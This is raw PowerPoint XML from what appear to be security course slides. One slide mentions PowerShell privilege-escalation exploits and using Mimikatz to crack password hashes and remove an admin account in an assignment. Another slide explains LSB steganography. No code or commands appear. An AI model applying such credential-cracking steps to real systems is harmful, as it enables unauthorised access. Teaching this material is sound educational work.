            <a:off x="76200" y="1324136"/>
            <a:ext cx="9025571" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>POWER SHELL EXPLOITS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some of you will be familiar with power shell in windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There are scripts that will give higher rights to run exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="14983" t="19759" r="59485" b="21062"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="914400"/>
            <a:ext cx="3276600" cy="4102484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="62346" t="16488" r="12122" b="50536"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="4495800"/>
            <a:ext cx="3276600" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348318" y="4648200"/>
            <a:ext cx="5643282" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>USING MIMICATS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A number of way to remove the admin but the assignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>was to make to one wiser!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>So finding the local user and then the system admin was an </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>idea by cracking the hash codes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40767010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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7219540" y="88033"/>
            <a:ext cx="1366567" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Hiding in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>images</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549738" y="682125"/>
            <a:ext cx="5860130" cy="1067728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Classic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>hiding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="595" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>replacing</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2204681">
              <a:spcBef>
                <a:spcPts val="2457"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-178" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Message  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>insert </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="357" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:cs typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>011010110</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Gill Sans MT"/>
              <a:cs typeface="Gill Sans MT"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3499835" y="2129033"/>
            <a:ext cx="2142633" cy="2142633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2451254" y="4655914"/>
          <a:ext cx="4227295" cy="1053058"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1409099">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1409099">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1409097">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="351028">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10010110</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10010111</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10011000</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="351028">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10010011</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10010111</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10011001</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="351002">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10010010</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10010111</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10011000</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033591" y="6621582"/>
            <a:ext cx="557448" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
